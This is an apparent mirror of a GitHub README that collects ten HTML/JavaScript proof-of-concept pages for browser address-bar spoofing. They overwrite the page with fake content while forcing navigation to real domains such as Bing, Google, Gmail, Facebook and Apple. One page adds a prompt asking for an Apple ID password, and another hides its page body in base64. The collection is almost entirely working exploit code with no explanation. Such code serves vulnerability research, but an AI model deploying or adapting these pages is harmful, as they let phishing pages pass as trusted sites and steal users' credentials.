Giter Site home page Giter Site logo

address-bar-spoofing-poc's Introduction

Address Bar Spoofing PoC Collection

POC-01.html

<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <title>Spoofing Page</title>
        <script>
            var spoof = function () {
                document.write("<h1>This is not Bing</h1>");
                document.location = "https://bing.com:8081";
                setInterval(function () {
                    document.location = "https://bing.com:8080";
                }, 2000);
            };
        </script>
    </head>
    <body>
        <input type="button" value="Spoof" onclick="spoof();"/>
    </body>
</html>

POC-02.html

<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <title>Spoofing Page</title>
        <script>
            function spoof() {
                location = "https://www.google.com/csi?random=" + Math.random();
                document.body.innerHTML = 'This is not Google!';
            }
        </script>
    </head>
    <body>
        <input type="button" value="Run" onclick="setInterval('spoof()', 20);"/>
    </body>
</html>

POC-03.html

<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <title>Spoofing Page</title>
        <script>
            function spoof() {
                document.write("<h1>This is not facebook.com</h1>");
                document.location = "https://facebook.com:1234";
                setInterval(function () {
                    document.location = "https://facebook.com:1234";
                }, 9800);
            }
        </script>
    </head>
    <body>
        <input type="button" value="Run" onclick="spoof();"/>
    </body>
</html>

POC-04.html

<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <title>Spoofing Page</title>
    </head>
    <body>
        <script>
            function spoof() {
                document.write("<title>Gmail</title>");
                document.write("This is not Gmail.com");
                window.location.assign("https://www.Gmail.com:8080");
            }
        </script>
        <input type="button" value="Run" onclick="setInterval(spoof, 100000);"/>
    </body>
</html>

POC-05.html

<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <title>Spoofing Page</title>
    </head>
    <body>
        <script>
            function spoof() {
                document.write("<h1>This is not apple.com</h1>");
                window.location.assign("http://www.apple.com:1234");
                setInterval(spoof24, 2000);
                setTimeout(function () {
                    prompt('Checking your appid password:');
                }, 6000);
            }
        </script>
        <input type="button" value="Run" onclick="spoof()"/>
    </body>
</html>

POC-06.html

<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <title>Spoofing Page</title>
    </head>
    <body>
        <script>
            function spoof() {
                document.write("<h1>This is not Bing</h1>");
                document.location = "https://bing.com:8081";
                setInterval(function () {
                    document.location = "https://bing.com:8080";
                }, 5000);
            }
        </script>
        <input type="button" value="Run test case" onclick="spoof()"/>
    </body>
</html>

POC-07.html

<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <title>Address Bar Spoofing</title>
    </head>
    <body>
        <script>
            function spoof() {
                document.write("This is not google.com");
                setTimeout(() => {
                    window.stop();
                    document.location = "https://google.com:" + Math.floor(Math.random() * 100) + "/login";
                }, 300);
            }
        </script>
        <input type="button" value="Run" onclick="spoof()"/>
    </body>
</html>

POC-08.html

<html>
    <title>Not Chrome</title>
    <body>
        <script>
            function spoof() {
                var data = 'PGh0bWw+PGJvZHk+PGgxIGFsaWduPSJjZW50ZXIiPlRoaXMgaXMgZGVmaW5pdGVseSBub3QgT3Blcm' + 'EuPC9oMT48L2JvZHk+PC9odG1sPg==';
                document.body.innerHTML = atob(data);
                window.location.assign("https://www.google.com:1231");
            }
            setInterval(spoof(), 100000);
        </script>
    </script>
</body>
</html>

POC-09.html

<html>
    <head>
        <title>Address Bar Spoof!</title>
    </head>
    <body>
        <script>
            function demo() {
                var evilPage = "";
                var x = window.open('','');
                setInterval(function(){x.location.replace('https://www.google.com:8080');});
                x.document.write(atob(evilPage));

            }
        </script>
        <button onclick="demo();">test</button>
    </body>
</html>

POC-10.html

<html>
    <body>
        <script>
            window.onload = function() {
                    var payload = "";
                    document.write(atob(payload));
                    window.location = 'https://www.google.com:8888';
                }
        </script>
    </body>
</html>

address-bar-spoofing-poc's People

Contributors

hackintoanetwork avatar

Stargazers

Greedun avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.